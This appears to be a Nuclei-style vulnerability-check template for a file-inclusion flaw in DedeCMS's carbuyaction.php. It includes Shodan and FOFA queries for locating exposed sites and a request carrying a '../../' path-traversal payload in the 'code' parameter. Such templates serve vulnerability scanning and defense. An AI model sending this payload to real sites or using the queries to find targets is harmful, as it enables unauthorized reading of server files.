A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter.
shodan: http.html:"power by dedecms" || title:"dedecms"
fofa: app="DedeCMS"
PoC代码[已公开]
id: dedecms-carbuyaction-fileinclude
info:
name: DedeCmsV5.6 Carbuyaction Fileinclude
author: pikpikcu
severity: high
description: A vulnerability in DedeCMS's 'carbuyaction.php' endpoint allows remote attackers to return the content of locally stored files via a vulnerability in the 'code' parameter.
reference:
- https://www.cnblogs.com/milantgh/p/3615986.html
classification:
cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: dedecms
product: dedecms
shodan-query: http.html:"power by dedecms" || title:"dedecms"
tags: dedecms,vuln
http:
- method: GET
path:
- '{{BaseURL}}/plus/carbuyaction.php?dopost=return&code=../../'
headers:
Cookie: code=cod
host-redirects: true
matchers-condition: and
matchers:
- type: word
words:
- "Cod::respond()"
part: body
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502204a53247687b6d2d2fc12484105301500f52cb01667a9671e9d17b51e6660f46d022100f849b7613c85fec6ad342af83a689b87caa372ae9edea586667126c949b5cbec:922c64590222798bb761d5b6d8e72950